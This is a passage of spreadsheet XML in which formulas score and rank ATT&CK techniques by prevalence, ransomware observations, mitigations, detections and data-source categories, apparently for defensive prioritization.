        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.942871571428576</v>
      </c>
      <c r="AR231" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS231" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT231" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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32" spans="1:47" ht="34">
      <c r="A232" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B232" s="37">
        <f t="shared" si="3"/>
        <v>518.43692004761897</v>
      </c>
      <c r="C232" s="37" t="s">
        <v>811</v>
      </c>
      <c r="D232" s="50" t="s">
        <v>812</v>
      </c>
      <c r="E232" s="37"/>
      <c r="F232" s="37">
        <v>1</v>
      </c>
      <c r="G232" s="37">
        <v>1</v>
      </c>
      <c r="H232" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I232" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J232" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K232" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L232" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M232" s="37">
        <v>0.36307699999999998</v>
      </c>
      <c r="N232" s="56">
        <v>1</v>
      </c>
      <c r="O232" s="56">
        <v>13</v>
      </c>
      <c r="P232" s="56">
        <v>6</v>
      </c>
      <c r="Q232" s="56">
        <v>2</v>
      </c>
      <c r="R232" s="57"/>
      <c r="S232" s="57">
        <v>0</v>
      </c>
      <c r="T232" s="57"/>
      <c r="U232" s="57">
        <v>0</v>
      </c>
      <c r="V232" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190475</v>
      </c>
      <c r="W232" s="37">
        <v>0</v>
      </c>
      <c r="X232" s="37">
        <v>0</v>
      </c>
      <c r="Y232" s="37">
        <v>0</v>
      </c>
      <c r="Z232" s="37">
        <v>22</v>
      </c>
      <c r="AA232" s="37">
        <v>0.22</v>
      </c>
      <c r="AB232" s="37">
        <v>0.22</v>
      </c>
      <c r="AC232" s="37"/>
      <c r="AD232" s="50" t="s">
        <v>813</v>
      </c>
      <c r="AE232" s="37" t="str" cm="1">
        <f t="array" ref="AE232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD232)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF232" s="37">
        <v>228</v>
      </c>
      <c r="AG232" s="37" t="str" cm="1">
        <f t="array" ref="AG232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD232)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH232" s="37">
        <v>228</v>
      </c>
      <c r="AI232" s="37" t="str" cm="1">
        <f t="array" ref="AI232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD232)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ232" s="37">
        <v>228</v>
      </c>
      <c r="AK232" s="37" t="str" cm="1">
        <f t="array" ref="AK232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD232)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL232" s="37">
        <v>228</v>
      </c>
      <c r="AM232" s="37" t="str" cm="1">
        <f t="array" ref="AM232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD232)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN232" s="37">
        <v>0</v>
      </c>
      <c r="AO232" s="37">
        <v>6</v>
      </c>
      <c r="AP232" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ232" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>172.81230668253966</v>
      </c>
      <c r="AR232" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS232" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT232" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU23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24.830329526077094</v>
      </c>
    </row>
    <row r="233" spans="1:47" ht="51">
      <c r="A233" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B233" s="37">
        <f t="shared" si="3"/>
        <v>91.7</v>
      </c>
      <c r="C233" s="37" t="s">
        <v>814</v>
      </c>
      <c r="D233" s="50" t="s">
        <v>815</v>
      </c>
      <c r="E233" s="37"/>
      <c r="F233" s="37">
        <v>1</v>
      </c>
      <c r="G233" s="37">
        <v>1</v>
      </c>
      <c r="H233" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I233" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J233" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K233" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L233" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M233" s="37">
        <v>0</v>
      </c>
      <c r="N233" s="56">
        <v>0</v>
      </c>
      <c r="O233" s="56">
        <v>0</v>
      </c>
      <c r="P233" s="56">
        <v>0</v>
      </c>
      <c r="Q233" s="56">
        <v>0</v>
      </c>
      <c r="R233" s="57"/>
      <c r="S233" s="57">
        <v>0</v>
      </c>
      <c r="T233" s="57"/>
      <c r="U233" s="57">
        <v>0</v>
      </c>
      <c r="V233" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W233" s="37">
        <v>0</v>
      </c>
      <c r="X233" s="37">
        <v>0</v>
      </c>
      <c r="Y233" s="37">
        <v>0</v>
      </c>
      <c r="Z233" s="37">
        <v>0</v>
      </c>
      <c r="AA233" s="37">
        <v>0</v>
      </c>
      <c r="AB233" s="37">
        <v>0</v>
      </c>
      <c r="AC233" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD233" s="50" t="s">
        <v>816</v>
      </c>
      <c r="AE233" s="37" t="str" cm="1">
        <f t="array" ref="AE233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD233)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF233" s="37">
        <v>229</v>
      </c>
      <c r="AG233" s="37" t="str" cm="1">
        <f t="array" ref="AG233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD233)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH233" s="37">
        <v>229</v>
      </c>
      <c r="AI233" s="37" t="str" cm="1">
        <f t="array" ref="AI233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ233" s="37">
        <v>229</v>
      </c>
      <c r="AK233" s="37" t="str" cm="1">
        <f t="array" ref="AK233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL233" s="37">
        <v>229</v>
      </c>
      <c r="AM233" s="37" t="str" cm="1">
        <f t="array" ref="AM233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN233" s="37">
        <v>0</v>
      </c>
      <c r="AO233" s="37"/>
      <c r="AP233" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ233" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>30.566666666666666</v>
      </c>
      <c r="AR233" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS233" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT233" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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34" spans="1:47" ht="51">
      <c r="A234" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B234" s="37">
        <f t="shared" si="3"/>
        <v>92.100000000000009</v>
      </c>
      <c r="C234" s="37" t="s">
        <v>817</v>
      </c>
      <c r="D234" s="50" t="s">
        <v>818</v>
      </c>
      <c r="E234" s="37"/>
      <c r="F234" s="37">
        <v>1</v>
      </c>
      <c r="G234" s="37">
        <v>1</v>
      </c>
      <c r="H234" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I234" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J234" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K234" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L234" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M234" s="37">
        <v>0</v>
      </c>
      <c r="N234" s="56">
        <v>0</v>
      </c>
      <c r="O234" s="56">
        <v>0</v>
      </c>
      <c r="P234" s="56">
        <v>0</v>
      </c>
      <c r="Q234" s="56">
        <v>0</v>
      </c>
      <c r="R234" s="57"/>
      <c r="S234" s="57">
        <v>0</v>
      </c>
      <c r="T234" s="57"/>
      <c r="U234" s="57">
        <v>0</v>
      </c>
      <c r="V234" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W234" s="37">
        <v>0</v>
      </c>
      <c r="X234" s="37">
        <v>0</v>
      </c>
      <c r="Y234" s="37">
        <v>0</v>
      </c>
      <c r="Z234" s="37">
        <v>0</v>
      </c>
      <c r="AA234" s="37">
        <v>0</v>
      </c>
      <c r="AB234" s="37">
        <v>0</v>
      </c>
      <c r="AC234" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD234" s="50" t="s">
        <v>819</v>
      </c>
      <c r="AE234" s="37" t="str" cm="1">
        <f t="array" ref="AE234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF234" s="37">
        <v>230</v>
      </c>
      <c r="AG234" s="37" t="str" cm="1">
        <f t="array" ref="AG234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH234" s="37">
        <v>230</v>
      </c>
      <c r="AI234" s="37" t="str" cm="1">
        <f t="array" ref="AI234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD234)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ234" s="37">
        <v>230</v>
      </c>
      <c r="AK234" s="37" t="str" cm="1">
        <f t="array" ref="AK234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL234" s="37">
        <v>230</v>
      </c>
      <c r="AM234" s="37" t="str" cm="1">
        <f t="array" ref="AM234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN234" s="37">
        <v>0</v>
      </c>
      <c r="AO234" s="37"/>
      <c r="AP234" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ234" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>30.700000000000003</v>
      </c>
      <c r="AR234" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS234" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT234" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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35" spans="1:47" ht="34">
      <c r="A235" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B235" s="37">
        <f t="shared" si="3"/>
        <v>92.5</v>
      </c>
      <c r="C235" s="37" t="s">
        <v>820</v>
      </c>
      <c r="D235" s="50" t="s">
        <v>821</v>
      </c>
      <c r="E235" s="37"/>
      <c r="F235" s="37">
        <v>1</v>
      </c>
      <c r="G235" s="37">
        <v>1</v>
      </c>
      <c r="H235" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I235" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J235" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K235" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L235" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M235" s="37">
        <v>0</v>
      </c>
      <c r="N235" s="56">
        <v>0</v>
      </c>
      <c r="O235" s="56">
        <v>0</v>
      </c>
      <c r="P235" s="56">
        <v>0</v>
      </c>
      <c r="Q235" s="56">
        <v>0</v>
      </c>
      <c r="R235" s="57"/>
      <c r="S235" s="57">
        <v>0</v>
      </c>
      <c r="T235" s="57"/>
      <c r="U235" s="57">
        <v>0</v>
      </c>
      <c r="V235" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W235" s="37">
        <v>0</v>
      </c>
      <c r="X235" s="37">
        <v>0</v>
      </c>
      <c r="Y235" s="37">
        <v>0</v>
      </c>
      <c r="Z235" s="37">
        <v>0</v>
      </c>
      <c r="AA235" s="37">
        <v>0</v>
      </c>
      <c r="AB235" s="37">
        <v>0</v>
      </c>
      <c r="AC235" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD235" s="50"/>
      <c r="AE235" s="37" t="str" cm="1">
        <f t="array" ref="AE235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF235" s="37">
        <v>231</v>
      </c>
      <c r="AG235" s="37" t="str" cm="1">
        <f t="array" ref="AG235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH235" s="37">
        <v>231</v>
      </c>
      <c r="AI235" s="37" t="str" cm="1">
        <f t="array" ref="AI235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ235" s="37">
        <v>231</v>
      </c>
      <c r="AK235" s="37" t="str" cm="1">
        <f t="array" ref="AK235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL235" s="37">
        <v>231</v>
      </c>
      <c r="AM235" s="37" t="str" cm="1">
        <f t="array" ref="AM235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN235" s="37">
        <v>0</v>
      </c>
      <c r="AO235" s="37"/>
      <c r="AP235" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ235" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>30.833333333333332</v>
      </c>
      <c r="AR235" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS235" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT235" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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36" spans="1:47" ht="68">
      <c r="A236" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B236" s="37">
        <f t="shared" si="3"/>
        <v>301.33008609523813</v>
      </c>
      <c r="C236" s="37" t="s">
        <v>823</v>
      </c>
      <c r="D236" s="50" t="s">
        <v>824</v>
      </c>
      <c r="E236" s="37"/>
      <c r="F236" s="37">
        <v>1</v>
      </c>
      <c r="G236" s="37">
        <v>1</v>
      </c>
      <c r="H236" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I236" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J236" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K236" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L236" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M236" s="37">
        <v>5.5000000000000003E-4</v>
      </c>
      <c r="N236" s="56">
        <v>0</v>
      </c>
      <c r="O236" s="56">
        <v>1</v>
      </c>
      <c r="P236" s="56">
        <v>0</v>
      </c>
      <c r="Q236" s="56">
        <v>0</v>
      </c>
      <c r="R236" s="57" t="s">
        <v>825</v>
      </c>
      <c r="S236" s="57">
        <v>8</v>
      </c>
      <c r="T236" s="57" t="s">
        <v>826</v>
      </c>
      <c r="U236" s="57">
        <v>15</v>
      </c>
      <c r="V236" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22380961904761906</v>
      </c>
      <c r="W236" s="37">
        <v>23</v>
      </c>
      <c r="X236" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y236" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z236" s="37">
        <v>1</v>
      </c>
      <c r="AA236" s="37">
        <v>0.01</v>
      </c>
      <c r="AB236" s="37">
        <v>0.01</v>
      </c>
      <c r="AC236" s="37"/>
      <c r="AD236" s="50" t="s">
        <v>827</v>
      </c>
      <c r="AE236" s="37" t="str" cm="1">
        <f t="array" ref="AE236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD236)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF236" s="37">
        <v>232</v>
      </c>
      <c r="AG236" s="37" t="str" cm="1">
        <f t="array" ref="AG236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD236)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH236" s="37">
        <v>232</v>
      </c>
      <c r="AI236" s="37" t="str" cm="1">
        <f t="array" ref="AI236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD236)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ236" s="37">
        <v>232</v>
      </c>
      <c r="AK236" s="37" t="str" cm="1">
        <f t="array" ref="AK236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD236)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL236" s="37">
        <v>232</v>
      </c>
      <c r="AM236" s="37" t="str" cm="1">
        <f t="array" ref="AM236">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD236)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN236" s="37">
        <v>0</v>
      </c>
      <c r="AO236" s="37">
        <v>0</v>
      </c>
      <c r="AP236" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ236" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>100.44336203174605</v>
      </c>
      <c r="AR236" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS236" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT236" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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37" spans="1:47" ht="34">
      <c r="A237" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B237" s="37">
        <f t="shared" si="3"/>
        <v>288.09249528571428</v>
      </c>
      <c r="C237" s="37" t="s">
        <v>828</v>
      </c>
      <c r="D237" s="50" t="s">
        <v>829</v>
      </c>
      <c r="E237" s="37"/>
      <c r="F237" s="37">
        <v>1</v>
      </c>
      <c r="G237" s="37">
        <v>1</v>
      </c>
      <c r="H237" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I237" s="37">
